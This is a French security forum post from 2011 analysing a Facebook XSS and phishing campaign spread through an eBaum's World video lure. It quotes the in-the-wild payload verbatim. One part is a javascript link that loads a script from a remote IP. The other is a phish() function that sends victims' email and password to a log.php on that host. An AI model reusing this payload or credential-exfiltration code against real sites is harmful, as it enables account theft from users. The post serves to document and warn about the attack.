IPB

Bienvenue invité ( Connexion | Inscription )




 
Reply to this topicStart new topic
Vulnérabilité Facebook: Spam & Hameçonage, Facebook,Javascript,XSS,eBaum's World,Video,Spam,Phish,Stealer
CybStup
posté Apr 7 2011, 11:05 PM
Message #1


Accro à ZATAZ
****

Groupe : Modérateur ZATAZ
Messages : 431
Inscrit : 12-January 08
Lieu : Darknet
Membre no 4,034



Il y a quelques jours, un ver informatique s'est propagé en exploitant une vulnérabilité de type XSS sur facebook.
Aujourd'hui, une nouvelle vulnérabilité a été exploitée pour lire automatiquement une vidéo à l'aide d'un lecteur personnalisé hébergé sur eBaum's World avec une surprise à la clé.
La charge utile malveillante utilisée sur ce XSS est particulièrement soignée ; bien loin de l'habituelle et gentille méthode alert()

Citation
<a href=" javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement('script')).src='http://173.231.144.82/fb.js?like_link=http://www.pinkweddingfavors.info/bullypal/&amp;app_link=http://apps.facebook.com/palpushesbully/&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous'; window.close(); }else{ document.body.appendChild(document.createElement('script')).src='http://173.231.144.82/fb.js?like_link=http://www.pinkweddingfavors.info/bullypal/&amp;app_link=http://apps.facebook.com/palpushesbully/&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous'; }" target="_blank"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>
source: http://apps.facebook.com/palpushesbully/

http://edge.ebaumsworld.com/crossdomain.xml
Code
<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.www.media.ebaumsworld.com" />
  <allow-access-from domain="*media.ebaumsworld.com" />
</cross-domain-policy>
http://edge.ebaumsworld.com/mediaFiles/video/1564429/81417366.mp4

La vidéo n'était qu'un leurre,...
Citation
function phish(email, pass){
var log = new Image();
log.src = 'http://173.231.144.82/log.php?email=' + email + '&pass=' + pass;
}
Pour plus d'infos techniques, consulter: http://pastebin.com/73xfQ2wj

nb: 173.231.144.82 est une machine VoxCLOUD de chez Voxel.


--------------------
Come crawling faster,
Obey your Master,
Your fife burns faster,
Obey your Master, Master
Master of puppets I'm pulling your strings,
Twisting your mind and smashing your dreams,
Blinding by me you can's see a thing,
Just call my name cause i'll hear you scream
Master, Master..

До скорой встречи - Пока!
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))
0 membre(s) :

 



RSS Version bas débit Nous sommes le : 21st May 2013 - 02:04 AM